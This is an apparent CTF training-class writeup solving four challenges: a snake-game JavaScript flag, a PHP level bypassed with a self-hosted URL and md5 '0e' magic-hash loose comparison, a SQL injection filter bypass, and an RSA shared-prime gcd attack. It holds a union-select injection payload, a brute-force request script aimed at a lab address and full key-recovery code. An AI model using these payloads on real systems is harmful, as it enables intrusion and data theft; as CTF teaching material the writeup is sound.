Provincial competition training class writeup

web: 贪吃蛇 (Snake)

View the page source:

// dialogue
if(len <= 60 && len % 10 == 0) {
    var cheer = SAY[len/10-1];
    trace(cheer);
}
if(len == 70) {
    trace(anss);
}

if(len <= 100 && len > 60) {
    var cheer = SAY[5];
    trace(cheer);
}

The game only prints anss once the snake reaches length 70, so there is no need to play that far: search the JS for anss, concatenate the pieces and base64-decode the result to get the flag.
ZzJsVXR0NG9ub1VzX1NuN2E4ZQo=
(decodes to g2lUtt4onoUs_Sn7a8e)

web1

index.php~ (an editor backup copy of index.php) is readable and gives the source:

<?php
error_reporting(0);
session_start();

if ($_SESSION['level1'] !== 'go') {
    // Level 1: file_get_contents($a) must return exactly "12345"
    if(!$_GET['a'])
    {
        header('Location: index.php?a=1a');
        die();
    }
    $a=$_GET['a'];

    // php://input is blocked (case-insensitive substring match on "input")
    if (stristr($a, 'input')) {
        die('no no no no ');
    }

    // "correct road!" - the hint that an http:// URL is the intended route
    if (stristr($a, 'http')) {
        echo "<br />正确的的道路!碰碰碰!<br />";;
    }

    $a2 = @file_get_contents($a,'r');

    if($a2=="12345")
    {
        echo "离flag又近了一步!";   // "one step closer to the flag!"
        $_SESSION['level1'] = 'go';
        header('Location: index.php');
    }
    else
    {
        print "<p class='layui-elem-quote'>
Tips: 12345,no CRLF。
</p>";
    }
}else{
    // Level 2
    if(!($_POST['b']) and !($_POST['c']))
    {
        echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>
要通过这一关需要POST参数b和c!
</p>";   // "this level needs the POST parameters b and c!"
        die();
    }

    $b = $_POST['b'];
    $c = $_POST['c'];

    if (!(is_numeric($b))) {
        echo "<br /> b 出错!<br />";   // "b is wrong!"
        die();
    }

    if (!(ctype_upper($c)) || (strlen($c) >= 5)) {
        echo "<br /> c 出错!<br />";   // "c is wrong!"
        die();
    }

    echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>";

    // unquoted constants h and r: with error_reporting(0) they silently fall back to the strings 'h' and 'r'
    $hack = $_GET[h];
    $rep = $_GET[r];

    if ((strlen($hack) >= 6) || (strlen($rep) >= 6)) {
        echo "<br /> h OR r 出错!<br />";   // "h or r is wrong!"
        die();
    }

    $str1 = hash('md5', $b, false);
    $str2 = strtr(hash('md5', $c, false), $hack, $rep);

    echo "<p class='layui-elem-quote'>str1 : $str1</p>";
    echo "<p class='layui-elem-quote'>str2 : $str2</p>";

    // loose == : two numeric strings are compared as numbers
    if (($str1 == $str2) && !($b === $c) && (strlen($c) === 4)) {
        include('flag.php');
        echo "<p class='layui-elem-quote'>
$flag
</p>";
    }

}

?>

Level 1 needs $a2 == "12345". The challenge blocks the php://input wrapper (stristr($a, 'input')), and the message printed on 'http' hints that the server is meant to fetch a URL, so host the content yourself.

Start a web server on a host the target can reach:
python -m SimpleHTTPServer 80   (python3 -m http.server 80 on Python 3)
Put a file there whose content is exactly 12345, with no trailing newline: the check is == against the string "12345", which is what the "no CRLF" tip is about. Then request
?a=http://172.16.1.230/1.txt

Level 2
The flag is printed only when ($str1 == $str2) && !($b === $c) && (strlen($c) === 4).

Constraints on the parameters:

  1. b must be numeric (is_numeric)
  2. c must consist of uppercase letters only (ctype_upper) and be exactly 4 characters long
  3. h and r must each be at most 5 characters long (strlen >= 6 dies)

$str1 = hash('md5', $b, false);
$str2 = strtr(hash('md5', $c, false), $hack, $rep);

strtr lets us substitute characters of the md5 of c one-for-one, and an md5 hex digest only contains 0-9 and a-f.

This points at PHP's loose string comparison: when both sides of == are numeric strings, PHP compares them as numbers, and a string of the form 0e followed only by digits is parsed as 0 × 10^n = 0, so two such strings compare equal even though they differ.

Choose b=240610708, whose md5 is 0e462097431906509019562988736854, so str1 has the form 0e<digits>.
Then map the letters a, b, c, d and f to 0 (h=bcdaf, r=00000). Only the letter e survives the mapping, so whenever the mapped md5(c) starts with 0e and contains no other e, str2 is also of the form 0e<digits> and the two compare equal.

Run a brute-force script:

import itertools
import re
import requests

base = "http://172.16.0.223:10025/index.php"
url = base + "?h=bcdaf&r=00000"   # strtr maps b,c,d,a,f -> 0; both values stay under 6 chars
s = requests.Session()             # the level-1 pass lives in the PHP session, so keep the cookie
s.get(base, params={"a": "http://172.16.1.230/1.txt"})

alphabet = "ABCDEFGHIJKLMNOPQRST"
for combo in itertools.product(alphabet, repeat=4):
    payload = "".join(combo)
    body = s.post(url, data={"b": "240610708", "c": payload}).text
    # "flag" is the link text on every level-2 page, so matching on it always
    # hits; check the echoed str2 line for the 0e<digits> form instead.
    if re.search(r"str2 : 0e[0-9]+</p>", body):
        print(payload)
        print(body)
        break

(I originally expected "flag{xx}" to appear, but it did not, and I only spotted the flag by chance... so I changed the check from whether "flag" appears to whether the page length changes.)
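The same search can be done offline, which avoids sending tens of thousands of POSTs to the target: compute md5(c) locally, apply the same strtr mapping, and only submit the c that yields a 0e<digits> string. The block below is an added example, not the original script. It reimplements PHP's string strtr and the numeric-string rule in Python, and the helper names (php_strtr, str2_for, passes_server_checks, find_collision) are mine.

```python
import hashlib
import itertools
import re
import string

# PHP's strtr($str, $from, $to) with string arguments: character-for-character
# translation; if the two maps differ in length the extra characters are ignored.
def php_strtr(s: str, frm: str, to: str) -> str:
    n = min(len(frm), len(to))
    return s.translate(str.maketrans(frm[:n], to[:n]))

# Under PHP's loose ==, two numeric strings are compared as numbers, and
# "0e<digits>" is the float 0 * 10^n == 0. It is the only such form an md5
# hex digest (0-9, a-f) can take.
MAGIC = re.compile(r"^0e[0-9]+$")

def is_magic_hash(h: str) -> bool:
    return MAGIC.match(h) is not None

def str2_for(c: str, h: str = "bcdaf", r: str = "00000") -> str:
    """What index.php computes as $str2 for a given c, h and r."""
    return php_strtr(hashlib.md5(c.encode()).hexdigest(), h, r)

def passes_server_checks(b: str, c: str, h: str, r: str) -> bool:
    """The input validation index.php applies before the hash comparison."""
    return (b.isdigit()                                    # is_numeric($b) (digits suffice here)
            and c.isalpha() and c.isupper() and len(c) == 4  # ctype_upper, strlen($c) === 4
            and len(h) < 6 and len(r) < 6                   # strlen($hack)/strlen($rep) >= 6 dies
            and b != c)                                     # !($b === $c)

def find_collision(b: str = "240610708", h: str = "bcdaf", r: str = "00000",
                   alphabet: str = string.ascii_uppercase, length: int = 4):
    """First c (length letters from alphabet) with str1 == str2 under PHP's ==, or None."""
    str1 = hashlib.md5(b.encode()).hexdigest()
    if not is_magic_hash(str1):
        raise ValueError("b must hash to a 0e<digits> value")
    for combo in itertools.product(alphabet, repeat=length):
        c = "".join(combo)
        str2 = str2_for(c, h, r)
        if is_magic_hash(str2) and passes_server_checks(b, c, h, r):
            return c, str1, str2
    return None

if __name__ == "__main__":
    hit = find_collision()
    if hit:
        c, str1, str2 = hit
        print(f"POST b=240610708&c={c}  (with GET h=bcdaf&r=00000)")
        print("str1 :", str1)
        print("str2 :", str2)
```

Roughly 1 in 300 four-letter candidates survives the mapping in the 0e<digits> form (the mapped first character must be 0, the second must be e, and no other e may appear), so the search finishes almost immediately and a single POST with the returned c collects the flag.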

web_google

The hint is clear enough: some characters are filtered, so bypass them. The payload replaces every space with an inline comment (/*1*/, which MySQL treats as whitespace), mixes the case of the keywords to slip past a case-sensitive keyword blacklist, and ends with %23 (#) to comment out the remainder of the original query.
payload: ?q=a'Union/*1*/Select/*1*/flag,2,3/*1*/fRom/*1*/flag_is_here%23
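To see why the payload works, here is an added example (not from the challenge, whose actual filter the page does not show) that models the kind of blacklist it defeats and the normalisation a filter would need before matching. The filter list NAIVE_BLACKLIST and the function names are assumptions for illustration.

```python
import re

# The writeup's payload; # is sent URL-encoded as %23
PAYLOAD = "a'Union/*1*/Select/*1*/flag,2,3/*1*/fRom/*1*/flag_is_here#"

# Hypothetical filter of the kind this payload defeats: a case-sensitive
# blacklist on the space character and lowercase keywords (assumption).
NAIVE_BLACKLIST = (" ", "union", "select", "from")

def naive_filter_blocks(q: str) -> bool:
    return any(bad in q for bad in NAIVE_BLACKLIST)

def strip_inline_comments(q: str) -> str:
    """Replace MySQL /* ... */ comments with a space, which is how the parser sees them."""
    return re.sub(r"/\*.*?\*/", " ", q, flags=re.S)

def normalised_filter_blocks(q: str) -> bool:
    """Normalise before matching: drop comments, lowercase, then match whole keywords."""
    stripped = strip_inline_comments(q).lower()
    return re.search(r"\b(union|select|from)\b", stripped) is not None
```

The naive check lets the payload through because none of its literal strings occur; after comment stripping and lowercasing the same query reads a'union select flag,2,3 from flag_is_here# and is caught. Even the normalised blacklist only narrows the bypass space (other comment syntaxes, encodings, alternative whitespace); parameterised queries are the fix, not a better blacklist.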

rseeyb

from flag import flag
from Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long

def gen_arg(i):
    p = getPrime(1024)
    q = getPrime(1024)
    open("log" + str(i) + ".txt", "w").write(hex(p) + "\n" + hex(q))
    n = p * q
    e = 65537
    return n, e, p, q

def bosssay():
    n, e, p, q = gen_arg(0)
    m = bytes_to_long(flag)
    c = pow(m, e, n)
    open("boss.txt", "w").write(hex(c) + "\n" + hex(n))
    tigersay(c, p, e)        # the same p is handed on for the second modulus

def tigersay(c, p, e):
    q = getPrime(1024)
    n = p * q                # shares the factor p with boss's n
    cc = pow(c, e, n)
    open("tiger.txt", "w").write(hex(cc) + "\n" + hex(n))

def main():
    bosssay()

if __name__ == "__main__":
    main()

To get the flag we need m.
p and q are random primes and so n is random too, but tigersay is called with the same p, and both moduli can be read from the output files (boss.txt and tiger.txt).

That is:

p1*q1 = n1
p1*q2 = n2

gcd(n1, n2) gives p, and n1 / p then gives q1 (n1 itself is in boss.txt alongside c).
With p, q and e we can compute d = e^-1 mod (p-1)(q-1).
With d we can compute m = c^d mod n1 and recover the flag.

Finding p

def gcd(a, b):
    # Euclid's algorithm (math.gcd does the same)
    if a < b:
        a, b = b, a
    while b != 0:
        temp = a % b
        a = b
        b = temp
    return a

a = int('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', 16)   # n from boss.txt
b = int('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', 16)   # n from tiger.txt
print(gcd(a, b))

Finding d

import gmpy2   # pow(e, -1, (p-1)*(q-1)) does the same on Python 3.8+ without gmpy2

p = 172065274198469189283258716424446639773480626144334666332478217946919793335602221300934660008232589355869707615568396174912658652274737343045515395260992451036815064822752321636897666620519427304650758819067183595079837669597720555459781664173209246049359959646976532109655213507238169247598408455347594122469

q = 107358207355730736936889083588800229444187884634054259953241331748575375310111476765364237880870359959162518892064193664135467809538414994442476728730509181761387417634298093397849594799616939842557971048106559229367803451860384013747556580201683919504103040210551672981061719111972580224275121441431057701773

e = 65537

d = gmpy2.invert(e,(p-1)*(q-1))
print(d)

Finding m

from Crypto.Util.number import long_to_bytes

c=7227205058970917253988697272348629072390742730442079261849578753481528018734243776906928810426466711340893496456684228915781322418699561381615396497213577612459731019244931946960529198136200125770814185660801019344503988528919155161210054032498490653811789195374068721678191531695543450594060714122907514239407158295416162414682815878753567087081549537449887383514261265616895987906117428228003018537805648300967622300154073730197361122372486381575741009333643822321470837038252958232982771343391969736104839542012120480213479803517978736879018055329258472236889803298431730999776160072273717790635931420082199722637

d=9190506549030717721645205476165975712158417357992695314425592798265953098722816456463164481372835090232053278464116605067243715894518126968769488722268194649568809839519390988991663676909516975703254530413358310674133837270112006159784792878019684593975770310326973853269103107142247044945160889006130724582944837573873770180752269571959144161340357150024549558740219011126543123287362749998825055227640689726443364874091297444906252238737394459533134164632385241481222433068249524304622285059459643198031906649202438827609842195056980865745999310153318955309918072652249898298376252462873020768565340722078151516321

n=18472619386119921098063602750766409564120904078720703944719072416731760051248151325131154100954778056447834009406330428335028872249863046284495061718434971255253361051726134062612606955579310986832613388937626927763316852517062213938962644017873276980782373146902376416049107843120328914450438851217407510795607149055956619000499773971192981608276828988640098563504566796588712879216893620371181362602771841009871176509267913418966578678280447335170106267017712501072595986597204652731859164012966111251650153717654643071183402267794648610132185106594057257258857734796205184320940954506572252327466572125289840437537

m = pow(c, d, n)
print(long_to_bytes(m))

(I'm not very good at this, so I didn't put it all into one script.)
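The three steps above combined into one self-contained script, as an added example that is not the writeup's own code. It regenerates the challenge's situation with constructed small Mersenne primes (2^127-1, 2^107-1, 2^89-1) instead of the real 1024-bit values so it runs instantly and offline, reproduces bosssay/tigersay's reuse of p, and then runs the gcd attack end to end; make_challenge, recover_flag and the constant names are mine.

```python
from math import gcd

E = 65537

# Constructed demo parameters, not the challenge's primes: Mersenne primes
# 2^127-1, 2^107-1 and 2^89-1. Only P_SHARED is reused, exactly as gen_arg
# and tigersay reuse p. 65537 divides 2^k-1 only when 32 | k, so it is
# coprime to (p-1)(q-1) for these choices.
P_SHARED = 2**127 - 1
Q_BOSS = 2**107 - 1
Q_TIGER = 2**89 - 1

def bytes_to_long(b: bytes) -> int:
    return int.from_bytes(b, "big")

def long_to_bytes(n: int) -> bytes:
    return n.to_bytes((n.bit_length() + 7) // 8, "big")

def make_challenge(flag: bytes):
    """Reproduce bosssay/tigersay: returns (c, n1) as in boss.txt and (cc, n2) as in tiger.txt."""
    n1 = P_SHARED * Q_BOSS
    n2 = P_SHARED * Q_TIGER
    m = bytes_to_long(flag)
    if m >= n1:
        raise ValueError("flag too long for the demo modulus")
    c = pow(m, E, n1)          # boss encrypts the flag under n1
    cc = pow(c, E, n2)         # tiger re-encrypts c under n2 (irrelevant to the attack)
    return (c, n1), (cc, n2)

def recover_flag(boss, tiger):
    """Shared-prime attack: p = gcd(n1, n2), then q, d and m follow."""
    c, n1 = boss
    _, n2 = tiger
    p = gcd(n1, n2)
    if p == 1 or p == n1:
        raise ValueError("moduli do not share a nontrivial factor")
    q = n1 // p
    phi = (p - 1) * (q - 1)
    d = pow(E, -1, phi)        # gmpy2.invert(e, phi) in the writeup
    m = pow(c, d, n1)
    return long_to_bytes(m), p, q, d

if __name__ == "__main__":
    boss, tiger = make_challenge(b"flag{shared_prime_gcd}")
    flag, p, q, d = recover_flag(boss, tiger)
    print(flag)
```

The point of the check in recover_flag is that the attack only works because the two moduli share a factor; two properly generated RSA keys have gcd(n1, n2) = 1 and the function refuses rather than computing nonsense. Against the real files, replace the constants with the hex values from boss.txt and tiger.txt (int(value, 16)) and call recover_flag directly.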